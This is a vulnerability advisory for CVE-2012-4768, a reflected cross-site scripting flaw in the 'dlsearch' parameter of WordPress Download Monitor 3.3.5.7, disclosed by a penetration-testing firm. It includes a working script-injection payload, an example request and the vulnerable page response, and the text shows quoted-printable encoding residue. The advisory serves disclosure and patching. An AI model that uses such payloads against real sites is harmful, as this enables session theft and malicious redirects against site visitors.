Wordpress Download Monitor - Download Page Cross-Site Scripting
/-----------------------------------------------------------------\
| Wordpress Download Monitor - Download Page Cross-Site Scripting |
\-----------------------------------------------------------------/
Summary
=3D=3D=3D=3D=3D=3D=3D
Wordpress Download Monitor 3.3.5.7 is subject to a cross-site scripting =
vulnerability. The 'dlsearch' parameter is not sufficiently=20
sanitised before being written to pages including the '[download_page]' =
shortcode. An attacker could distribute a malicious URL as part=20
of a phishing campaign. Users following the link would trigger this =
vulnerability which could potentially steal session cookies,=20
redirect the user to a malicious URL or download malware onto their =
machine.
CVE number: CVE-2012-4768
Impact: Medium
Vendor homepage: http://mikejolley.com/
Vendor notified: 30/08/2012
Vendor fixed: 30/08/2012
Credit: Chris Cooper and Joseph Sheridan of ReactionIS
This advisory is posted at:
http://www.reactionpenetrationtesting.co.uk/wordpress-download-monitor-xs=
s.html
Affected Products
=3D=3D=3D=3D=3D=3D=3D=3D =3D=3D=3D=3D=3D=3D=3D=3D
Confirmed in Wordpress Download Monitor 3.3.5.7. Versions prior to =
3.3.5.9 may also be affected.
Details
=3D=3D=3D=3D=3D=3D=3Dcv
The 'dlsearch' parameter, written to any page/post including the =
'[download_page]' shortcode, was found to be subject to a cross-site=20
scripting vulnerability. It was possible to inject arbitrary Javascript =
code into the parameter which is passed into the page content=20
without sanitisation.=20
Injecting the following Javascript code will trigger the vulnerability, =
causing the page to return a Javascript alert box:
"><script>alert('xsstest')</script>
---
Example Request:
+---------------
GET /wp/?dlsearch=3D"><script>alert('xsstest')</script> HTTP/1.1
Host: 192.168.0.6
---
Example Response:
+----------------
--- SNIP ---
<form id=3D"download-page-search" action=3D"" method=3D"post">
<p><label for=3D"dlsearch">Search Downloads:</label> <input =
type=3D"text" name=3D"dlsearch" id=3D"dlsearch" =
value=3D""><script>alert('xsstest')
</script>" /><input class=3D"search_submit" type=3D"submit" value=3D"Go" =
/><input type=3D"hidden" name=3D"page_id" value=3D"2"=20
/></p></form><h3>Results found for =
<em>""><script>alert('xsstest')</script>"</em> <small><a=20
href=3D"« Downloads" rel="nofollow">http://192.168.0.6/wp/">« Downloads</a></small></h3>
--- SNIP ---
Impact
=3D=3D=3D=3D=3D=3D
An attacker might entice users to follow a malicious URL, causing =
Javascript code to execute in their browser, potentially stealing=20
session cookies, redirecting the user to a malicious URL or downloading =
malware onto their machine.
Solution
=3D=3D=3D=3D=3D=3D=3D=3D
Upgrade to Wordpress Download Monitor 3.3.5.9.
Distribution
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
In addition to posting on the website, a text version of this notice has =
been posted to the following e-mail and Usenet news recipients.
* bugtraq () securityfocus com
* full-disclosure () lists grok org uk
Future updates of this advisory, if any, will be placed on the =
ReactionIS corporate website, but may or may not be actively announced =
on=20
mailing lists or newsgroups. Users concerned about this problem are =
encouraged to check the URL below for any updates:
http://www.reactionpenetrationtesting.co.uk/wordpress-download-monitor-xs=
s.html
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D
Reaction Information Security=20
Lombard House Business Centre,
Suite 117,
12-17 Upper Bridge Street,
Canterbury, Kent, CT1 2NF
Phone: +44 (0)1227 785050
Email: research () reactionis {dot} co {dot} uk
Web: http://www.reactionpenetrationtesting.co.uk
Joseph Sheridan
Director
CHECK Team Leader, CREST Infrastructure, CREST Application, CISSP
Tel: 07812052515
Web: www.reactionis.com
Email: joe@reactionis.co.uk
Reaction Information Security Limited.
Registered in England No: 6929383
Registered Office: 1, The Mews, 69 New Dover Road, Canterbury, CT1 3DZ
=20
This email and any files transmitted with it are confidential and are =
intended solely for the use of the individual to whom they are =
addressed. If you are not the intended recipient please notify the =
sender. Any unauthorised dissemination or copying of this email or its =
attachments and any use or disclosure of any information contained in =
them, is strictly prohibited.
=EF=81=90 Please consider the environment before printing this email